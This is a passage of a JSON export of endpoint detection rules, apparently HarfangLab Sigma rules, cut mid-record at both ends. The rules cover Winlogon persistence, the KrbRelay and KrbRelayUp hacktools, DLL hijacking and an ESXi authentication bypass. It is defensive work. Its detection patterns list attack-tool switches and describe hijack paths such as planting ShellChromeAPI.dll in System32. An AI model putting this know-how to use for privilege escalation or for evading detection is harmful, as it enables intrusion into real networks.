NT\\CurrentVersion\\Winlogon\\Userinit'\n Details: '?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE,'\n\n exclusion_zonecentral:\n Image: '?:\\Program Files\\Prim?x\\ZoneCentral\\zcs.exe'\n Details: '*zcuserinit.exe*'\n\n exclusion_igfxcui:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\igfxcui\\DLLName'\n Details: 'igfxdev.dll'\n\n exclusion_logishrd:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LBTWlgn\\DLLName'\n Details|contains: '?:\\program files\\common files\\logishrd\\bluetooth\\LBTWlgn.dll'\n\n exclusion_ccnotify:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ccnotify\\DLLName'\n Details: 'ccnotify.dll'\n\n exclusion_novell:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\LCredMgr\\DLLName'\n Details: '?:\\Program Files\\Novell\\CASA\\bin\\lcredmgr.dll'\n\n exclusion_zencredmanager:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\ZenCredManager\\DLLName'\n Details: 'ZenCredManager.dll'\n\n # https://tsplus.net/fr/\n exclusion_tsplus:\n ProcessCommandLine:\n - '?:\\wsession\\svcr.exe logonsession.bin ?:\\wsession\\logonsession.exe'\n - '?:\\Program Files (x86)\\TSplus\\UserDesktop\\files\\APSC.exe'\n TargetObject|endswith: '\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_displaynote_technologies:\n ProcessImage: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n Details: '?:\\Program Files (x86)\\DisplayNoteTechnologies\\Launcher\\KioskStarter.exe'\n\n # Windows in kiosk mode\n exclusion_customshellhost:\n ProcessCommandLine|contains: '?:\\windows\\system32\\svchost.exe -k AssignedAccessManagerSvc'\n Details: 'customshellhost.exe'\n\n exclusion_kiosk:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n 
Details: 'conhost.exe --headless pwsh -WindowStyle hidden -File \"?:\\Windows\\System32\\Kiosk.ps1\"'\n\n exclusion_isl_online:\n ProcessImage:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\ISLLightService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\ISLLightService.exe'\n Details:\n - '?:\\Program Files (x86)\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Program Files (x86)\\ISL Online\\ISL Restart\\s_?\\isl_notify64.dll'\n - '?:\\Users\\\\*\\AppData\\Local\\ISL Online Cache\\ISL Restart\\s_?\\isl_notify64.dll'\n\n exclusion_archimed:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: '?:\\Program Files\\Archimed\\shell\\unishell.exe'\n\n exclusion_crews:\n TargetObject: '*\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details: 'CrewsDesk.exe'\n ProcessImage: '*\\Resa Crews Cupps\\CrewsCupps.exe'\n\n exclusion_omniware:\n ProcessImage|endswith: '\\APSC.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'JWTS SASU'\n - 'Remote Access World SAS'\n Details|startswith: '?:\\ProgramData\\alternateshell.exe'\n\n exclusion_ivanti:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n Details|contains:\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pwrstart.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_windowssetup:\n Image:\n - '?:\\$WINDOWS.~BT\\Sources\\setupplatform.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_userlock:\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit'\n 
Details|contains: '?:\\WINDOWS\\SYSWOW64\\ULAGENTEXE.EXE'\n\n exclusion_kerberos:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\MIT_KFW\\DLLName'\n Details: '?:\\WINDOWS\\system32\\kfwlogon.dll'\n\n exclusion_wkplogin:\n ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\WPKGLogon\\DLLName'\n Details: '?:\\Program Files\\wpkg\\wpkglogon.dll'\n\n exclusion_resavista:\n ProcessImage|endswith: '\\RESAVistaIDSClient.exe'\n TargetObject:\n - 'HKLM\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell'\n Details|endswith: '\\RESAVistaIDSClient.exe'\n\n condition: 1 of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "20feacae-9a99-4ce6-8f8c-c02176cb730a",
"rule_name": "Winlogon Helper DLL Installed",
"rule_description": "Detects a change of the Winlogon configuration via registry modification.\nAttackers may abuse features of Winlogon to execute DLLs and/or executables at user logon.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do it.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1547.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21030089-c22d-4b59-9389-818ed924fae4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.095808Z",
"creation_date": "2026-03-23T11:45:34.095810Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.095815Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/cube0x0/KrbRelay/",
"https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/",
"https://attack.mitre.org/techniques/T1558/003/",
"https://attack.mitre.org/techniques/T1550/003/"
],
"name": "t1558_003_krbrelay_hacktool_usage.yml",
"content": "title: KrbRelay HackTool Executed\nid: 21030089-c22d-4b59-9389-818ed924fae4\ndescription: |\n Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\n KrbRelay has already been used by attackers to perform various Active Directory attacks.\n It is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\nreferences:\n - https://github.com/cube0x0/KrbRelay/\n - https://www.microsoft.com/en-us/security/blog/2022/05/25/detecting-and-preventing-privilege-escalation-attacks-leveraging-kerberos-relaying-krbrelayup/\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2023/07/06\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelay\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelay.exe'\n - OriginalFileName: 'KrbRelay.exe'\n\n selection_cmd_default:\n CommandLine|contains|all:\n - ' -spn '\n - ' -clsid '\n\n selection_cmd_option:\n CommandLine|contains:\n - ' -rbcd '\n - ' -shadowcred'\n - ' -add-groupmember '\n - ' -laps'\n - ' -ssl'\n - ' -console'\n - ' -add-privileges '\n - ' -secrets'\n - ' -service-add '\n - ' -session '\n\n selection_cmd_llmnr:\n CommandLine|contains|all:\n - ' -llmnr'\n - ' -spn '\n - ' -secrets'\n\n selection_cmd_ntlm:\n CommandLine|contains|all:\n - ' -session '\n - ' -clsid '\n - ' -ntlm'\n\n condition: selection_krb_name or (selection_cmd_default and selection_cmd_option) or selection_cmd_llmnr or selection_cmd_ntlm\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21030089-c22d-4b59-9389-818ed924fae4",
"rule_name": "KrbRelay HackTool Executed",
"rule_description": "Detects the usage of the KrbRelay HackTool, which is a no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced.\nKrbRelay has already been used by attackers to perform various Active Directory attacks.\nIt is recommended to check the behavioral context around the execution of this tool to determine whether it is legitimate.\n",
"rule_creation_date": "2023-07-06",
"rule_modified_date": "2025-01-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.003",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21167834-ee25-40c7-a927-f927643c10a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599004Z",
"creation_date": "2026-03-23T11:45:34.599007Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599015Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iisexpresstray.yml",
"content": "title: DLL Hijacking via iisexpresstray.exe\nid: 21167834-ee25-40c7-a927-f927643c10a8\ndescription: |\n Detects potential Windows DLL Hijacking via iisexpresstray.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/09/05\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iisexpresstray.exe'\n ImageLoaded|endswith: '\\mscoree.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21167834-ee25-40c7-a927-f927643c10a8",
"rule_name": "DLL Hijacking via iisexpresstray.exe",
"rule_description": "Detects potential Windows DLL Hijacking via iisexpresstray.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21216328-38a3-45d2-b301-ea234729a5e0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.610112Z",
"creation_date": "2026-03-23T11:45:34.610116Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.610123Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/",
"https://attack.mitre.org/techniques/T1078/002"
],
"name": "t1078_002_possible_cve_2024_37085_exp_group.yml",
"content": "title: Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass\nid: 21216328-38a3-45d2-b301-ea234729a5e0\ndescription: |\n Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\n VMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\n This group is not a built-in group in Active Directory and does not exist by default.\n It is recommended to investigate and determine if this is a legitimate administrative action.\nreferences:\n - https://www.rapid7.com/blog/post/2024/07/30/vmware-esxi-cve-2024-37085-targeted-in-ransomware-campaigns/\n - https://attack.mitre.org/techniques/T1078/002\ndate: 2024/07/30\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1078.002\n - cve.2024-37085\n - classification.Windows.Source.EventLog\n - classification.Windows.Exploit.CVE-2024-37085\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID:\n - 4727 # Security-enabled Global Group was Created\n - 4728 # Member was Added to Security-enabled Global Group\n - 4755 # Security-enabled Universal Group was Created\n - 4756 # Member was Added to Security-enabled Universal Group\n GroupName: 'ESX Admins'\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21216328-38a3-45d2-b301-ea234729a5e0",
"rule_name": "Possible Exploitation of ESXi CVE-2024-37085 Authentication Bypass",
"rule_description": "Detects either a group creation or a member addition possibly indicating the exploitation of an authentication bypass vulnerability in domain-joined ESXi hypervisors (CVE-2024-37085).\nVMware ESXi hypervisors joined to an Active Directory domain consider any member of a domain group named \"ESX Admins\" to have full administrative access by default.\nThis group is not a built-in group in Active Directory and does not exist by default.\nIt is recommended to investigate and determine if this is a legitimate administrative action.\n",
"rule_creation_date": "2024-07-30",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1078.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098621Z",
"creation_date": "2026-03-23T11:45:34.098623Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098627Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_multidigimon.yml",
"content": "title: DLL Hijacking via multidigimon.exe\nid: 21364c07-fc54-4cf0-8a5e-4dd14ed9910d\ndescription: |\n Detects potential Windows DLL Hijacking via multidigimon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'multidigimon.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\NInput.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21364c07-fc54-4cf0-8a5e-4dd14ed9910d",
"rule_name": "DLL Hijacking via multidigimon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via multidigimon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2140fee8-47d6-4020-b659-5713bfec9a3c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075299Z",
"creation_date": "2026-03-23T11:45:34.075301Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075305Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Dec0ne/KrbRelayUp",
"https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19",
"https://attack.mitre.org/techniques/T1558/003/",
"https://attack.mitre.org/techniques/T1550/003/"
],
"name": "t1558_003_krbrelayup_tool_usage.yml",
"content": "title: KrbRelayUp HackTool Executed\nid: 2140fee8-47d6-4020-b659-5713bfec9a3c\ndescription: |\n Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\n This tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\n It automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\n The tool also includes support for shadow credentials, eliminating the need for additional machine accounts. Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\n It is recommended to check the context of use of this tool and to look for other malicious actions on the host.\n If no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\nreferences:\n - https://github.com/Dec0ne/KrbRelayUp\n - https://twitter.com/malmoeb/status/1552403545793581056?t=1MuOT3JoyUWqfpp3CBbPLg&s=19\n - https://attack.mitre.org/techniques/T1558/003/\n - https://attack.mitre.org/techniques/T1550/003/\ndate: 2022/08/03\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1558.003\n - attack.lateral_movement\n - attack.t1550.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.KrbRelayUp\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_krb_name:\n - Image|endswith: '\\KrbRelayUp.exe'\n - OriginalFileName: 'KrbRelayUp.exe'\n\n selection_cmd_relay:\n CommandLine|contains: ' relay '\n\n selection_cmd_spawn:\n CommandLine|contains: ' spawn '\n\n selection_cmd_krbscm:\n CommandLine|contains: ' krbscm '\n\n 
selection_cmd_domain:\n CommandLine|contains:\n - ' -d '\n - ' --Domain '\n - ' -Domain '\n\n selection_cmd_cn:\n CommandLine|contains:\n - ' -cn '\n - ' --ComputerName '\n - ' -ComputerName '\n\n selection_cmd_service_command:\n CommandLine|contains:\n - ' -s '\n - ' -sc '\n - ' --ServiceName '\n - ' --ServiceCommand'\n - ' -ServiceName '\n - ' -ServiceCommand'\n\n condition: selection_krb_name or\n ((selection_cmd_relay or selection_cmd_spawn) and selection_cmd_domain and selection_cmd_cn) or\n (selection_cmd_krbscm and selection_cmd_service_command)\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2140fee8-47d6-4020-b659-5713bfec9a3c",
"rule_name": "KrbRelayUp HackTool Executed",
"rule_description": "Detects the usage of the KrbRelayUp HackTool, which is a no-fix local privilege escalation in Windows domain environments using Kerberos.\nThis tool provides a streamlined wrapper around several well-known tools such as \"Rubeus\", \"KrbRelay\", \"ADCSPwn\", \"Whisker\" and \"SCMUACBypass\".\nIt automates local privilege escalation by coercing machine account authentication, relaying Kerberos to LDAP or ADCS, and abusing S4U2Self or RBCD to gain NT AUTHORITY/SYSTEM access.\nThe tool also includes support for shadow credentials, eliminating the need for additional machine accounts. Furthermore, it bypasses mitigations like Protected Users by leveraging PKInit-based authentication.\nIt is recommended to check the context of use of this tool and to look for other malicious actions on the host.\nIf no legitimate use of this tool is identified, the machine should be isolated and investigated immediately.\n",
"rule_creation_date": "2022-08-03",
"rule_modified_date": "2025-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1550.003",
"attack.t1558.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21699dd6-a401-4ab8-bbda-d513d587c561",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593663Z",
"creation_date": "2026-03-23T11:45:34.593667Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593675Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/0gtweet/status/1564131230941122561",
"https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_deviceenroller.yml",
"content": "title: Phantom DLL Hijacking via DeviceEnroller.exe\nid: 21699dd6-a401-4ab8-bbda-d513d587c561\ndescription: |\n Detects potential Phantom DLL Hijacking via DeviceEnroller.exe.\n Phantom DLL Hijacking takes advantage of non-existing DLL that a legitimate application tries to load.\n Attackers used this technique by copying a malicious DLL to System32 under ShellChromeAPI.dll, which is loaded by DeviceEnroller.exe if the parameter /PhoneDeepLink is present.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/0gtweet/status/1564131230941122561\n - https://dennisbabkin.com/blog/?t=pwning-windows-updates-dll-hijacking-through-orphaned-dll\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/30\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'deviceenroller.exe'\n ProcessCommandLine|contains: 'PhoneDeepLink'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded: '?:\\Windows\\System32\\ShellChromeAPI.dll'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 